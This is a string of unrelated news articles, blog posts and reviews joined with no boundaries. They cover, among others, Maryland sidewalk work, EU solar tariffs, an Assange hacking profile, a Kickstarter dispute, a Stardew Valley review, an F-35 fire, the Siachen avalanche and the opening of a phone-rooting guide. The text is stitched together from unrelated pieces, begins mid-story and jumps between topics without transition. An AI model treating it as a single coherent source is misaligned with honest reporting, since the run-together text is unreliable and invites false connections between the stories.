7 On Your Side contacted Prince George's County Public Works Department. They contracted road crews to place sidewalks along Old Landover Road.
“We truly apologize,” said Paulette Jones with Public Works. “The contractor should have placed some temporary access for residents to get to their homes.” Jones added such access may include gravel or steel plates.
“I walk up and down the street and knock on doors and trying to talk to people and we do the best we can,” said Jeff Johnson, President of the Greater Landover Civic Association.
“We've been fighting for these roads for about 15 years now, trying to get streets in here for the safety of my residents. A lot of people were getting hit on the side of the road,” added Johnson.
If road crews come to your house, contractors tell 7 On Your Side you must tell them in person that you need to have continued access to your driveway. If you do not tell them, road crews will not automatically lay gravel or steel plating to allow access. They cite the cost and time needed that prevents them with providing access to all affected residents driveways.
Road crews were seen laying concrete on the Loines family driveway Monday afternoon.
“I appreciate you guys coming out. I really do,” Loines told 7 On Your Side. “You guys helped me. Because I think this actually motivated them to get this done.”
Image copyright Getty Images Image caption Chinese exports of solar panels into the European Union are worth 21bn euros a year
The European Commission is on the verge of a trade war with China over the import of solar panels worth 21bn euros (£18bn) a year.
It is considering imposing an average "anti-dumping" import tariff of 47%, with a decision expected by 5 June.
The EC argues China unfairly subsidises its solar panel firms, putting Europe's manufacturers at a disadvantage.
But some European solar panel makers are warning that such a move would amount to "dangerous protectionism".
"Protective duties are poisonous for the solar industry", said Udo Mohrstedt, chief executive of IBC Solar, a Germany-based global manufacturer.
"These guarding measures will endanger more than 70,000 jobs in medium-sized companies in Germany alone. The Commission must stop this dangerous protectionism."
Wouter Vermeersch, chief executive of the Belgian company Cleantec Trade, agrees.
"The solar business is very price sensitive", he said in a statement issued by the Alliance for Affordable Solar Energy, where Cleantec is a member.
"Solar companies already had to cope with continuously decreasing feed-in tariffs in the past.
"If prices are artificially increased by punitive tariffs, the European solar market would simply come to a standstill with disastrous effects on green jobs."
Trade dispute
Trade officials from all 27 countries in the European Union are expected to be briefed on the proposals at in meeting on 15 May.
The provisional tariffs would be imposed even though the EC's official investigation is only nine months into its 15-month duration.
The EC can do this if it considers there is clear evidence that companies are being harmed.
If the EC believes China has not altered its trade practices after the full 15-month investigation comes to an end in December, the provisional tariffs could be imposed for five years.
The case, involving over 100 Chinese companies exporting photovoltaic and solar panels worth 21bn euros (£17.8bn; £27.7bn) a year, is the EU's largest ever trade dispute.
The Chinese could appeal against the EU's decision to the European Court of Justice in Luxembourg and to the World Trade Organisation.
It is known that Russia is a land of contrasts, of extremes, if you want. This matter comes to the fore because Russian carrier Transaero, an airline that is no stranger to this blog, has recently unveiled two initiatives that aim at the two opposite ends of the market.
On the one hand, Transaero is rolling our its first class, called "Imperial", on its new Boeing 737-800 covering routes to London, Paris, Tel Aviv, Paphos (Cyprus), Astana and Almaty (Kazakhstan). This Imperial class cabin will feature seats that transform into flatbeds and meals from prestigious Moscow restaurant Pushkin (a treat I can personally recommend!)
Many airlines have first class cabins on long-haul large aircraft but this might be about the first time I see a three class configuration on such a small aircraft. Transaero is fitting its Boeing 737-800s with four Imperial class seats, eight business class seats and 132 passengers on economy.
In addition to appealing to the top end of corporate traffic, Moscow is a city with a large number of affluent people, for many of whom the gap between business class and flying executive on short and medium haul flights might seem to large, thus opening up a market opportunity in this segment.
On the other hand, in a move the is somehow reminiscent of a recent transatlantic inter-line agreement with American airline JetBlue, Transaero has signed an inter-line agreement with low-cost carrier Easyjet. As per this agreement the Russian airline will be selling part of Easyjet's capacity on the Moscow-Domodedovo to London-Gatwick route through its own distribution channels.
Transaero already has its own flights between Moscow-Vnukovo and London-Heathrow, but this opens up new options for those traveling between the two capitals, as both Transaero and Easyjet have important networks radiating out of London Gatwick and Moscow Domodedovo respectively (even after the Russian airline announcement that it is shifting a larger part of its operations to Moscow Vnukovo airport). An offer that will appeal to a segment of passengers certainly different from those using the new short haul Imperial class!
The nearly 500,000 U.S. Army documents published by WikiLeaks this year didn't mark the first time founder Julian Assange thumbed his nose at the Pentagon. A new documentary about the secret-spilling site captures Assange in a rare moment of reminiscence as he reflects on his hacking of a Defense Department network in the 1990s, where he evidently kept a backdoor in place for some two years.
The documentary WikiRebels, produced by Sveriges Television in Sweden, was recently posted on the web in four parts. It provides an overview of Assange and WikiLeaks from the time the site published a classified Army video last April showing an Apache gunship attack in Iraq, to the latest release of U.S. State Department cables.
It also includes interviews with several current and former WikiLeaks activists, including former spokesman Daniel Domscheit-Berg and Icelandic volunteer Herbert Snorrason, who discuss the internal conflict at WikiLeaks that led them to resign.
It's a compelling documentary, even if it provides little new information. In one segment (above, at 3:53), Assange reflects on his work as a black hat hacker in the early 1990s, recalling wistfully how he and others hacked into the Pentagon's Security Coordination Center. The SCC was a Chantilly, Virginia, office that handled computer security issues for MilNet — later NIPRNet — the U.S. military's portion of the public internet.
“We had a backdoor in the U.S. military Security Coordination Center –- this is the peak security for controlling the security of MilNet … U.S. military internet. We had total control over this for two years,” he tells the interviewer.
A backdoor refers to a malicious tool that hackers place on a network, once they've gained entry, to provide them with easy and continued surreptitious access to the network, allowing them to come and go at will.
The Defense Department did not immediately respond to an inquiry about the decades-old hack. The statute of limitations, it should be noted, has long since expired.
The intrusion was previously mentioned in an early version of Assange's bio published by WikiLeaks when the site launched in 2006, which reads in part: “As a teenager he became Australia's most famous ethical computer hacker. After referrals from the United States government his phone was tapped in 1991, and he spent six years in court. He hacked a thousand of systems, including the Pentagon and the U.S. military Security Coordination Center.”
Assange, who used the handles “Proff” and “Mendax” during his black hat years, teamed up with two other hackers who called themselves the International Subversives. The group broke into networks in Europe and the U.S., including networks belonging to NASA, the Defense Department and the Los Alamos National Laboratory. Assange continued the activity until he was 21, when he was charged with 31 counts of hacking and other related activities and ultimately pleaded guilty to 25 charges.
Currently, U.S. authorities are reportedly trying to build a conspiracy case against Assange for his WikiLeaks work that would likely revolve around the Computer Fraud and Abuse Act (CFAA), the federal anti-hacking legislation.
Alleged WikiLeaks source Bradley Manning, who is suspected of leaking the Iraq video and war documents to Assange, has been charged under the CFAA and the Espionage Act. The CFAA makes it illegal to gain unauthorized access on a computer network or to exceed authorized access, as Manning is accused of doing.
If U.S. authorities can show that Assange encouraged or advised Manning on how to obtain the classified documents or how to cover his tracks after downloading them, they could charge Assange with conspiracy in Manning's unauthorized computer activity.
See also:
In January of 2014, a company called Playdek launched a Kickstarter promising a spiritual successor to one of my favorite games, Final Fantasy Tactics. It made $660,126. I really wish I hadn't backed it.
I and 15,823 other suckers gave money to Playdek last year for Unsung Story, a game they said would be “a spiritual successor in a storied line of epic tactical RPGs designed by Yasumi Matsuno,” director of FFT and Vagrant Story, among other games. The impressive Kickstarter pitch promised a story-heavy strategy-RPG that sounded like the Tactics sequel fans have been craving for years now. I backed it, and I wrote about it several times on Kotaku. Now I regret that. Unsung Story has become yet another one of Kickstarter's many disasters—a frustratingly opaque project that's apparently switched focus and has left tons of backers asking for refunds.
When the Unsung Story Kickstarter first launched, Playdek promised that the game would be out in July of 2015, but in an update sent to backers yesterday, CEO Joel Goodman wrote that it's been delayed to late 2016 thanks to layoffs and other unfortunate financial circumstances at the company. Fine. Delays happen. What's more alarming is that Playdek seems to have switched focus on Unsung Story to make it more of a multiplayer game, and that their new development timeline is all about player vs. player combat rather than the narrative-heavy single-player game that the Kickstarter initially promised.
Check out the new timeline, via yesterday's update:
Phase One June 2016: Initial PvP beta release for online testing. This will include multiple arenas and two character schools with fully functional game play. Phase Two August - Sep 2016: Additional schools will be added, post beta feedback from the previous phase. Other online features TBD will come online. Phase Three October 2016: Online skirmish mode against the A.I. will be added, allowing for A.I. balancing and testing that will include all of the feedback gathered from the online PvP beta game play. The Design and Art backer tiers will be involved with their respected character and scenario creation process. Phase Four Post October 2016: While the online PvP beta testing is going on, the scenarios for the first two episodes will be blocked out and built, and the scripting will be adjusted as the A.I. is balanced from the beta feedback. When these episodes, along with character creation and item collection are polished, the first two episode campaigns will be released.
Advertisement
Backers are, understandably, furious about this development. They gave Unsung Story over $600,000 because they wanted a spiritual successor to Final Fantasy Tactics, not a multiplayer game—in fact, the words “PvP” and “multiplayer” aren't even mentioned on the page of the original pitch. The Kickstarter comments are now full of people asking for refunds:
I feel the same damn way.
Really, I should've seen this coming; there's been an aura of sketchiness surrounding this project from the beginning. In February of 2014, as the Unsung Story Kickstarter was winding down, Playdek offered me an interview with Matsuno, but they added a caveat: I'd have to publish it in Q&A format. I told them that I'd love to do the interview, but that I couldn't agree to a condition like that, as we at Kotaku prefer not to let outside parties dictate how we publish our stories. They said they'd get back to me. Three days later, they cancelled, saying he wouldn't be able to do it.
Advertisement
After the Kickstarter succeeded, things went quiet for a while. Updates were sporadic and insubstantial, especially through 2015. Months would pass without a word from Playdek, but in May, they wrote: “Development on the game is progressing nicely. As we continue down this path we will finalize a development timeline to share with everyone later this summer.”
Turns out development wasn't progressing all that nicely, but backers wouldn't learn that until way later. Playdek was MIA all summer—we were all left in the dark as to why the game had slipped past the originally-promised July 2015 release date—and when their update finally went live yesterday, it left a very bitter taste in backers' mouths. I can confidently say this because I am a damn backer.
Last night, I e-mailed Playdek's Goodman to ask him two questions. For starters: why the sudden switch in focus to PvP? Weren't players expecting a single-player story game?
Advertisement
“The PvP focus is not a sudden switch, but more importantly to the backers, it does not impact the single player campaign mode as far as content and depth,” he wrote. “The best way to ensure that the campaigns have balanced scenarios with good A.I. is to gather play testing data from online players in head to head matches, and then polish the game with that feedback... Due to the lack of consistent updates the backers did not know that this has been our internal development approach, but the idea that online game play was going to be in the game was covered in the KS video, as well as subsequent updates. It is a bonus to the single player story experience.”
And I asked if Playdek would be giving out refunds to backers who requested them.
“We are delivering the game and rewards that the backers are entitled to,” Goodman wrote.
Advertisement
That'd be a no. So those of us who backed Unsung Story are stuck waiting until late 2016 for something that seems nothing like what was originally promised. Even Delita would be ashamed by this one.
You can reach the author of this post at jason@kotaku.com or on Twitter at @jasonschreier.
The Department of Homeland Security announced Thursday night that the Trump administration would maintain an Obama-era program providing protection to undocumented immigrants brought to the US illegally as children by their parents -- but it's unlikely those who consume the news through conservative media outlets have a clue.
The news that President Donald Trump had decided not to deliver on a key campaign promise, at least for the moment, was covered widely by traditional media outlets such as CNN and the Washington Post. The New York Times deemed the announcement important enough to send out a push alert to its readers.
But the announcement did not seem to rate with Trump's immigration hardline allies in the conservative press. The story was nowhere to be found on the the front pages of Breitbart or the Drudge Report. FoxNews.com did not appear to cover it on its home page either.
"If we're not covering it, we deserve to be hammered," one Breitbart staffer told CNN on Friday afternoon.
On the campaign trail, Trump promised he would "immediately terminate" the Deferred Action for Childhood Arrivals program, which President Barack Obama enacted through executive action. The program protects approximately 750,000 so-called "Dreamers."
"Anyone who has entered the United States illegally is subject to deportation -- that is what it means to have laws and to have a country," Trump said, for instance, during one August speech in Phoenix.
Historically, outlets like Breitbart and the Drudge Report have taken hardline positions on immigration and strongly criticized politicians who have sought to grant "amnesty" to individuals in the country illegally. Republicans like House Speaker Paul Ryan and Florida Sen. Marco Rubio have been lambasted by the sites in the past for showing even a hint of willingness to compromise with Democrats on the issue.
Moreover, the right-wing press has routinely gone after Republican politicians with fury if they walk back hardline conservative positions -- particularly in regards to immigration. But such outlets chose not to call Trump out on Friday for his breaking his campaign promise to eliminate DACA.
The Times said in its story that Trump's decision to break his campaign pledge would "disappoint some of the president's most ardent supporters." But if his supporters are getting their news from outlets friendly to the president, there is a good chance they aren't even aware of the news.
I've always loved vintage and handmade things. From the days when I sat cross-legged in the local library poring over vintage fashion books for sewing ideas to today when I'm on the hunt for the best vintage stores in Indianapolis, my appreciation for well-curated shops and creative handmade goods has been a lifelong interest.
I grew up on the South Side, in Franklin, and while my historic little town has always had some great antique shops and the best Goodwill around, recently there's been a surge of quality vintage shops including the newest boutique, Bird on a Wire. The first time I walked into Bird on a Wire, owned by Amy Grimmer, I was struck by the whimsical experience of the store as a whole. Nestled in a cute old house in downtown Franklin, a cozy cinnamon vanilla smell greets you at the door and the creaky wooden floors give the shop an authentic c'mon in feeling. When you stand in the doorway and look around, there are repurposed goodies and cool stuff all around. Lamps made from globes, a fabric chain made from sleeve cuffs, purses made from burlap feed sacks, and tasteful jewelry made from soda cans. Bird on a Wire truly is Pinterest + Etsy, in real life and I had the chance to ask Amy, the owner, a few questions.
SG: What do you love most about owning a brick-and-mortar shop?
AG: I get to play by my own rules! Walking into the shop in the morning is like walking into a little piece of heaven. It kind of reminds me of when I was a little girl and I would open my mom's walk in closet so I could try on all of her high heeled shoes. Dreamy!
SG: Your decor and the products you sell are so unique– where do you find all of your inspiration?
AG:I find inspiration just about everywhere. I love magazines, advertising and browsing websites and blogs.
SG: How long have you had the dream to open a shop like Bird on a Wire?
AG: It has been a dream of mine for a while. I have always enjoyed creating repurposed pieces, painting and decorating. After working in the recycling world for several years I realized the need and the niche for a retail outlet that offered refashioned merchandise, locally made items and recycled merchandise and that the offerings needed to be fun, unique and one of a kind with a touch of whimsy.
SG: What is the hardest and best part about owning a boutique?
AG: I always run out of enough time in a day.
SG: What do you want your shop to be in the future? What kinds of things do you have planned?
AG:Hopefully, this summer I will finally get the garage behind the shop converted into a studio in order to offer creative art and DIY workshops.
SG: What are 5 tips you have for someone who wants to start their own business someday?
AG: Have a solid business plan to start, be flexible, know that tasks will take much more time than you think they should, and most important, think outside of the box! I think that is only four, but pretty much sums things up.
So if you ever venture down to the South Side, be sure to check out Bird on a Wire! There's a lot to offer down here, including an antique market every month in Franklin that has a huge selection of (cheap) and neat old antiques. (I highly recommend it.) 🙂
LANGUAGE learners must resign themselves to making very public, very silly mistakes sooner or later. It's an occupational hazard. Regular readers will remember that I've begun dipping my feet in Dutch. After a few weeks, I can now get my most basic wants and needs across with little trouble. I'm only just starting, but I'm not exactly helpless anymore.
Imagine my frustration, then, when nobody understood me when I tried to speak about the lake in Amsterdam (IJ), the large artificial lake north of Amsterdam (IJsselmeer), or a local road in The Hague (IJsclubsweg). I even got blank stares when I mentioned the neighbourhood ice cream shop (IJssalon). Now, my pronunciation is far from perfect, but it's usually workable. Unfortunately, I had been pronouncing the first two letters in each, IJ, as initials: I-J, or (roughly) “ee-yay” in Dutch. Apparently that's as incomprehensible as referring to this newspaper as The E-C-onomist. IJ is, it turns out, a digraph in Dutch. That means it's used together to represent one sound, pronounced (roughly) “ay”. It's a fixed digraph, so when it appears at the beginning of a word, both I and J are capitalised together. In contrast, we might write of the Ij, the Ijsselmeer or Ijsclubsweg in English.
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks.
Digraphs are often sticky business. In Spanish, for example, the digraphs ch and ll were once considered letters separate from c, h, and l. Spanish readers might have even encountered ch and ll capitalised together at the beginnings of words (just like Dutch IJ), although that usage wasn't standard. But in 1994, the Royal Spanish Academy, a body that regulates Spanish usage, allowed them to be unstuck for the purposes of alphabetisation and sorting. They're no longer considered to be letters of their own. While before, cg and ci came before ch, it'd now be cg, ch, then ci. (Old letters die hard, though. In my beginner Spanish classes in America, I was taught the letters ch, ll, and even rr long after the 1994 spelling reform.)
Alphabetising Dutch is a bit trickier because there isn't a unified way to sort ij. The digraph is closely related to the letter y. They're both pronounced the same in isolation, so for clarity y can more specifically be called Griekse ij (Greek ij), similar to French i grec or Spanish i griega. In old words they can even be interchangeable, like in the placenames Y (IJ) or Ysselmeer (IJsselmeer). To make matters more knotty, ij might sometimes look like a y with two dots on top (resembling a diaeresis or an umlaut), as in the picture at right. So when sorting words, some texts mix y together with ij, but others, including my two modern dictionaries, don't. Dutch alphabet, consider me stymied.
I'm happy the ij mishap happened early enough for me to plead genuine ignorance. Readers are welcome to share their own stories of language learning embarrassments, if only to make me feel a little less silly.
Windows 10 on smaller tablets has been a little bit of a mystery ever since Microsoft originally unveiled many new features almost a year ago. While Intel-powered small tablets look like miniature PCs running the full version of Windows 10, ARM-powered tablets act more like a phone. Alcatel's Pixi 3 is the first 8-inch tablet to demonstrate Microsoft's plans for larger ARM-powered devices.
The Pixi 3 runs Windows 10 Mobile. It's the same mobile version of Windows 10 that powers the Lumia 950. That's a good move by Microsoft instead of the confusing past of Windows RT, but the end result doesn't feel finished. I got a chance to check out Alcatel's Pixi 3 here at CES this week, and it's clear Windows 10 Mobile doesn't really scale for larger tablet devices just yet.
Everything in Windows 10 Mobile on an 8-inch device just simply scales up, and I couldn't find any noticeable differences where the interface would adapt and make use of the larger screen. That could be partially related to the 1280 x 800 resolution on the Pixi 3, but I still expected the interface to adapt. It's literally just a giant phone UI right now.
Windows 10 Mobile on small tablets is far better than RT
I still prefer this phone UI to the confusing Windows RT operating system that existed for these tablets previously. You'll never see a desktop with Windows 10 Mobile, and for 8-inch devices that makes a lot of sense. Most manufacturers previously opted for Intel-powered 8-inch Windows devices with the full version of Windows 8, and that trend may continue with Windows 10. With Windows RT out of the way, device makers now have a better choice between Windows 10 Mobile and the full version of Windows 10.
The Pixi 3 itself is a low-end tablet powered by a 1.3GHz quad-core processor, so that means the latest Continuum feature of Windows 10 isn't available. Alcatel tells me they have other Windows 10 devices planned for 2016, with some high-end ones in the works so we'll likely see other manufacturers experiment with Windows 10 Mobile on tablets this year.
CHARLOTTE, N.C. -- LeBron James suffered a corneal abrasion of his right eye in the second half of the Cleveland Cavaliers' 112-105 win over the Charlotte Hornets on Friday that caused him to question his availability to play in Saturday's game against the Washington Wizards.
James was fouled by the Hornets' Jeremy Lamb with 31.2 seconds left in the third quarter while scoring an and-1 layup when the contact with his eye occurred. After covering his face and sitting on the floor beside the stanchion for several minutes, James signaled for a timeout and made his way to the bench to have his eye looked at by Cavs trainer Steve Spiro.
Following the timeout, James returned to the game and made the ensuing free throw. He went on to play the entire fourth quarter, scoring 10 of his 32 points to secure the victory.
LeBron James, who claimed he would "be all right" after sustaining the eye and back pains, credited his team for how they handled the Hornets. Chris Humphreys/USA TODAY Sports
After the game, James told reporters his vision was blurry in his right eye and he was attended to by the Hornets' team eye specialist.
James took another spill in the fourth, falling to the floor on his back from a foul by Michael Kidd-Gilchrist with 6:48 left.
"Just took a hard foul -- a hard fall, I'm sorry. And I just got up and made my free throws, I think I made them," said James, who went 1-for-2 from the line that possession but 14-for-16 for the game, representing a season high in free throw attempts. "I was just trying to put pressure on the rim, so, if coach decides to give me a game off, it's not because I'm resting. It's because I'm banged up."
Kevin Love suffered a corneal abrasion during the 2014-15 season with Cleveland that caused him to miss one game.
The last game James sat out, on the front end of a back-to-back last Saturday, caused shockwaves throughout the sport as it prompted NBA commissioner Adam Silver to issue a memo to all 30 teams that threatened significant penalties for resting players without merit.
Cavs coach Tyronn Lue said he would have to see how James, Love and Kyrie Irving feel before making a determination on their statuses for the Wizards game.
As for the win over the Hornets, Lue noted the amount of contact that went on.
"It was a physical game," he said. "That's the most I've ever seen LeBron hit the deck. He hit the deck a few times. It was a physical game. With these last 11 games, I think we're playing nine teams fighting for the playoffs or in the playoffs. This will be a good test for us going into the playoff stretch. It's good for us."
Irving echoed his coach, bracing for even more physical play.
"Well, I don't like anybody hitting my brother like that," Irving said of the blows James took. "But it's gearing up for playoff basketball. Some hits are definitely coming, some plays, some fights as you can see. So we just got to protect ourselves and protect our brothers if something happens like that. Obviously no one wants to get suspended but if it goes too far, as men we've got to protect our brothers."
James, who claimed he would "be all right" after sustaining the eye and back pains, credited his team for how they handled the Hornets.
"I liked our [disposition] tonight," James said. "We came in with a physical mindset and that eventually helped us win the game because we were just physical from the start all the way down to the finish."
Stardew Valley Review
Have you ever had the urge to just quit your stressful city job working as a faceless employee to a large corporation, and move to the farm your dear old grandpa left you?
No? oh… well that is the premise behind Stardew Valley.
Published by Chucklefish, who also published the excellent Terraria-like Starbound and the exceptionally addictive Risk of Rain. And developed by ConcernedApe, Stardew Valley is a farming/social simulator.
Before starting your new game you are shown a strangely comprehensive pixel art character creation screen, choose your sex, choose between a cat or a dog for your preferred pet, alter your skin colour (24 to choose from), hairstyle (32) and shirt (112) and even alter the colours with a handy set of sliders, select from 12 different accessories for your face (beards, glasses, earrings).
And finally, name your little farmer and his farm and list your favourite thing. With that done it is on to the game.
At the start of the game we are shown a large grey room, full of office drones mindlessly tapping away on their computers, the camera focuses on one employee… you. A flashback shows your grandfather in his bed handing you a letter with instructions to only read it when life has completely gotten you down… Luckily for us, today is the day.
From the dingy grey office we take the bus to Stardew Valley to discover that dear old Grandpa has left us his farm, unfortunately, it is a bit run down and covered in weeds and rubble and in desperate need of some tender loving care.
If you are familiar with the classic Nintendo series Harvest Moon you will know what to expect, for those of you who are not, read on.
You start out on your crumbling farm, with nothing on it but a single room shack, some ruins, and a lot of greenery. It is your aim to turn this sad little plot of land into a successful farm and live in peace and harmony with the townsfolk, maybe find a wife or husband and raise a child.
As you stare at the screen it's easy to feel a little daunted at the prospect of creating a fully operational farm, armed with nothing but a set of hand-me-down tools and a dream. You are given the freedom to progress however you want, there are no strict “go here, do this” instructions.
There are quests that appear in your journal, the first few automatically pop up, but others are made available to you from your post box or from the information board in town. Starting out with introducing yourself to the townsfolk, make friends, and learn the basics to becoming a farmer, these are fairly easy to do but the text could be a bit more descriptive in telling you what the game is asking of you, the “To The Beach” quest simply states:
“Someone named Willy invited you to visit the beach south of town. He says he has something to give you.”
What the game does not tell you is that you need to visit the beach before 5 pm or Willy will be wandering around the town, yes each of the townsfolk has their own daily routine that alters slightly depending on the day of the week and what season you are in.
Each townsperson also has their own likes and dislikes, so becoming super best friends with everyone requires you to work out their favourite type of gifts, not essential but as your friendship with someone grows they will start sending you recipes in the mail, if they are one of the 10 singletons in the town they will start to grow fonder of you, potentially leading to a happy marriage and a child in the future.
Of course managing a farm with tools that are older than time itself is doable, but eventually, you will want to upgrade them to something a bit more productive. You can upgrade your tools with metal bars made with the metal ores you find in a seemingly bottomless mine found in the north of the map. Inside the mine, you will not only find stone, ores and precious gems (which can be sold for a tidy profit) but also creatures who's sole motivation in life is to use your corpse as a throw rug. Luckily the adventurers' guild is set up right outside, ready and willing to sell you weapons, magic rings and armour to protect yourself.
Tools are not the only items that can be upgraded, located just outside of town is the carpenter, for a modest sum and an ample supply of wood; your lowly shack can become a palace. Want some more farm buildings? A silo for hay? A coop for our feathered friends? A barn for the four legged one? The carpenter can do it all, and when the coops and barns are built, go and see Marnie in the farm to the south of yours to get some animals to inhabit them.
The best way to look at Stardew Valley is as a time management game, 10 minutes of in-game time is equal to 10 seconds real time which in theory gives you 20 minutes for the day. 20 minutes sounds like a long time but as your farm grows in size, the time you have to spend on watering & harvesting crops, feeding the animals and checking the crab pots (yes there is fishing in Stardew Valley) slowly starts increasing. So you need to plan ahead for what you want to achieve.
A typical game day for me goes like this:
Wake at 6 am
Finish watering crops, feeding chickens and collecting eggs
Run to town and stock up on seeds before closing time
Collect upgraded tools from the Blacksmith
Hand over collected artefacts to the museum
Check crab pots
Spot of fishing on the beach
Quick trip to the Spa to replenish energy levels
Dash into the mine to collect ores
Lose track of time and run back to the shack for bed
Collapse 2 feet from my bed as the clock hits 2 am
If your unlucky enough to be caught out of bed at 2am you literally drop to the floor in exhaustion, and will wake up the next day to find your energy levels greatly reduced, a note from a townsperson with a short story about how you were found and potentially with some money missing (this is from either a medical bill, or you were mugged while you were laying on the floor…)
Getting knocked out in the mine by a monster is similar; if you take too much damage you will slump to the floor and wake up at the entrance, with Linus the homeless mountain man standing over you. Instead of losing energy the penalty is a bit more severe, every 5 levels in the mine has a checkpoint with a lift so you can quickly resume your exploring the next day, getting knocked out results in you forgetting some of the levels as well as losing gold and random items from your inventory.
I absolutely adore Stardew Valley, it is fantastically addictive, one of those games that suck you in and before you know it, your clock is telling you its 4 am and you need to sleep.
A Marine Corps F-35B caught fire during a late October flight because of a weapons bay defect that military officials knew about and were already working to fix.
Air Force Lt. Gen. Christopher Bogdan, the F-35 program executive officer, told reporters Monday at the program's offices in Arlington, Virginia, that the Oct. 27 mishap occurred when a bracket that held electrical wires in the weapons bay came loose, allowing the wires to chafe and come into contact with hydraulic lines, causing the fire.
Military.com broke the news about the fire, which caused at least $2 million in damage, according to Naval Safety Center estimates. An F-35B from Marine Fighter Attack Training Squadron 501, a 20-plane fleet replacement squadron for the Marine Corps based in Beaufort, South Carolina, was involved in the mishap.
"The good news is, we knew what it was," Bogdan said. "When knew about this problem long before that, and all of our airplanes were being retrofitted with a new bracket."
The F-35B that caught fire had not yet received the replacement bracket, he said, but had been inspected as part of a stopgap regiment designed to prevent mishaps. Prior to the flight, Bogdan said, the bracket had seemed to be holding.
"We inspected, it looked fine, and it just didn't look fine in the air," he said.
In the wake of the fire, the Marine Corps opted not to ground any aircraft or pause flight operations. Officials did, however, update the inspection regimen to make assessment of the faulty brackets more rigorous, Bogdan said.
Bogdan acknowledged it was a risk to fly the F-35Bs that had not yet received the bracket retrofit, but said it was one of many risks that come with operating the aircraft.
"Military airplanes all have risk," he said. "This plane is like no other and yes, there are acknowledged risks, and that would be one of them. Until we fix that bracket, every airplane of the B-model that doesn't have that bracket is going to have to be inspected, and hopefully that bracket remains in place when it's flying."
It's not yet clear when the retrofit process will be complete or how many aircraft still need the new equipment.
How a towed pinger locator is deployed
A towed pinger locator is a water-borne device used to locate the sonar "ping" from the underwater locator beacon which is fitted to the Cockpit Voice Recorders and Flight Data Recorders installed in commercial airliners.[1] They can locate pingers at depths of up to 20,000 feet (6,100 m) underwater.[2]
The locator is mounted in a hydrodynamic shell, or "tow fish", connected by winch behind a surface vessel across the search area. The locator listens for the sound emanating from the beacon or "pinger". Once located, the beacon and its attached recorders can be retrieved by divers, submersibles or remotely operated vehicle (ROV), depending on depth. A model currently used by the United States Navy is the TPL-25, which has a weight of 70 pounds (32 kg) and a length of 30 inches (760 mm); it is generally towed at 1–5 knots (2–9 km/h).[2]
Most beacons transmit a pulse once a second at 37.5 kHz.[3][2]
The hydrophone must be positioned below the thermocline layer which reflects sounds, either back to the surface or back to the ocean floor. Since the pinger signal is relatively weak, the hydrophone must be within a nautical mile (about 6,080 feet (1,850 m)) to detect it. The hydrophone is typically deployed about 1,000 feet (300 m) above the ocean floor, where it can scan a swath approximately 12,000 feet (3,700 m) wide, on a flat, level surface.[4]
See also [ edit ]
Highly Rated Copy URL
View Post
TLDR: Dva's damage output at 10m and beyond being nerfed to only 68% of what it is now.
Dva's damage nerf of 8.3% is already harsh enough but what you forgot about is her damage fall off.
Dva had 2 tiers of damage fall off distances that dropped her damage per pellet from 3 to 2 and then 2 to 1.
Right now it looks like you have it set so that at 10m Dva's damage drops by half (2 to 1 per pellet) where before you it would only drop by 1/3rd at that range.
This ends up with Dvas damage output at 10m and beyond being nerfed to only 68% of what it was before.
This is an absolutly massive damage nerf that I can't imagine blizz intended. On top of the 8.3% damage nerf at closer ranges and the armor nerfs these changes look like they are going to put Dva in the non viable hero category.
A search team pulled Lance Naik Hanamanthappa from an icy coffin deep in the snow, where he had been buried alive at an altitude of more than 19,000 feet.
Almost a week after a Himalayan avalanche struck a remote Indian military outpost, rescuers had all but given up hope of finding anybody alive.To survive under a 25-foot wall of hardened snow would be miraculous, if not impossible, they figured.But on Monday, a search team pulled Lance Naik Hanamanthappa from an icy coffin deep in the snow, where he had been buried alive at an altitude of more than 19,000 feet, according to AFP.The soldier - spared from death by an air pocket - was in critical condition when found and was airlifted to a hospital in Delhi, according to the BBC."We hope the miracle continues," the army said in a statement after the rescue. "Pray with us."Ten soldiers were buried when the avalanche struck on Feb. 3.Nine others stationed on the deadly Siachen glacier, which is near the border between India and Pakistan, are confirmed dead, according to the Indian army statement."All other soldiers are regrettably no longer with us," Gen. D.S. Hooda said, according to AFP.The army noted that the rescued corporal has pneumonia and liver and kidney problems and was placed on a ventilator "to protect his airway and lungs in view of his comatose state.""He is expected to have a stormy course in the next 24 to 48 hours due to the complications caused by re-warming and establishment of blood flow to the cold parts of the body," the statement said.Hanamanthappa's relatives were scheduled to visit him in the hospital Tuesday night, but first he received the nation's highest-profile guest: Prime Minister Narendra Modi, according to the Telegraph."No words are enough to describe [the] endurance and indomitable spirit of Lance Naik Hanamanthappa," he said, according to the newspaper. "He's an outstanding soldier."The massive avalanche slammed into the military outpost last Wednesday on the northern side of the glacier.Hooda, the army general, estimated that the avalanche was about a half-square mile; he described it as "an entire mountain of rock-solid snow," according to the Telegraph.With the help of rescue dogs, army and air force teams began a dangerous recovery effort that involved cutting through the snow with chain saws, according to the Associated Press.The chances of surviving such a disaster were so remote, the BBC reported, that Modi offered his condolences last week.Known as the "world's highest battlefield," the Siachen glacier is also one of the world's most dangerous environments in which to stage military operations. Last month, an avalanche killed four Indian soldiers on patrol. And in 2012, an avalanche killed 129 soldiers in the Pakistan-controlled portion of the glacier, according to the AP.
UMIDIGI is a Chinese phone famous for its inexpensive and high specs smartphones. Talking about the famous phones of UMIDIGI flagship series, UMI Z, Z Pro and Z1 standout among all. Before moving forward know that this guide is to install custom recovery on Android UMI smartphones based on MediaTek. Installing custom recovery like TWRP won't erase any data from your phone so don't worry about that. If you are looking for a guide on how to root and install TWRP on UMI smartphone then you are at the right place.
Most of the phones of Z series are identical. The latest one of UMIDIGI is S2. It is said to feature a 5100 mAh battery, that is huge. Along with that, it has a 6-inch display screen that too with 90% screen to body display. The best thing about display screen is its aspect ratio that is 18:9. The latest model of UMI smartphone also supports Face recognition and unlocking. The Company states their face unlocking is faster as compared to Apple and OnePlus. Umi is known to deliver premium features at the budget price.
Use the guide below to root and install TWRP on UMI smartphone:
Following is the list of supported devices. Using this guide, you can install TWRP recovery and root the devices mentioned in the list below:
UMI EMax
UMI Fair
UMI Hammer
UMI Hammer S
UMI Iron
UMI Zero
UMI Rome
UMI Iron Pro
Umi Rome
Umi Rome X
UMI Touch
Umi Super
Umi London.
UMI Max.
UMI Plus.
UMI Plus E.
UMI Z and Z pro.
UMI Touch X.
UMI Zero.
The guide below is only for the above-listed phones, drop a message in the comments if your phone is not listed in the lost above. This following guide is to root and install TWRP custom recovery on any UMI smartphone running on Android.
